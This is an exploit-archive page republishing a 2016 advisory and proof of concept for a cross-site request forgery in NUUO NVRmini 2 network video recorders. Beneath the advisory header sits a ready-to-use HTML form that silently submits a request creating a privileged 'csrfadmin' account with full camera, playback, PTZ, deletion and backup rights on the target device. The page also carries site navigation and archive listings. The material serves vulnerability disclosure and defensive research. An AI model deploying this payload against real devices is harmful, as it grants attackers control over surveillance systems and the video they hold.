NUUO 3.0.8 Add Admin Cross Site Request Forgery

NUUO 3.0.8 Add Admin Cross Site Request Forgery: Posted Aug 6, 2016; Authored by LiquidWorm | Site zeroscience.mk; NUUO versions 3.0.8 and below add administrator cross site request forgery exploit.; tags | exploit, csrf; SHA-256 | 3ff69f9197c891e79d9ceed13705b1137a72ee07d9fb46755ec772aa3b00be51; Download | Favorite | View

NUUO 3.0.8 Add Admin Cross Site Request Forgery

i>>?<!--

NUUO CSRF Add Admin Exploit


Vendor: NUUO Inc.
Product web page: http://www.nuuo.com
Affected version: <=3.0.8 (NE-4160, NT-4040)

Summary: NUUO NVRmini 2 is the lightweight, portable NVR solution with NAS
functionality. Setup is simple and easy, with automatic port forwarding
settings built in. NVRmini 2 supports POS integration, making this the perfect
solution for small retail chain stores. NVRmini 2 also comes full equipped as
a NAS, so you can enjoy the full storage benefits like easy hard drive hot-swapping
and RAID functions for data protection. Choose NVR and know that your valuable video
data is safe, always.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a logged-in
user visits a malicious web site.


Tested on: GNU/Linux 3.0.8 (armv7l)
           GNU/Linux 2.6.31.8 (armv5tel)
           lighttpd/1.4.28
           PHP/5.5.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5349
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5349.php


14.01.2016

-->


<!-- 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -->
<html>
  <body>
    <form action="http://10.0.0.17/users_xml.php">
      <input type="hidden" name="_password2" value="admin" />
      <input type="hidden" name="addusername" value="csrfadmin" />
      <input type="hidden" name="password" value="admin" />
      <input type="hidden" name="cmd" value="adduser" />
      <input type="hidden" name="group" value="poweruser" />
      <input type="hidden" name="displaygroup" value="power user" />
      <input type="hidden" name="magic" value="574" />
      <input type="hidden" name="liveacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
      <input type="hidden" name="pbacc" value="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16" />
      <input type="hidden" name="ptzacc" value="1" />
      <input type="hidden" name="ioacc" value="1" />
      <input type="hidden" name="backupacc" value="1" />
      <input type="hidden" name="deleteacc" value="1" />
      <input type="hidden" name="emapeacc" value="1" />
      <input type="hidden" name="remotalkacc" value="1" />
      <input type="hidden" name="logacc" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 179 files
Ubuntu 58 files
Debian 26 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
E1.Coders 4 files
malvuln 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

NUUO 3.0.8 Add Admin Cross Site Request Forgery

NUUO 3.0.8 Add Admin Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

NUUO 3.0.8 Add Admin Cross Site Request Forgery

Share This

NUUO 3.0.8 Add Admin Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems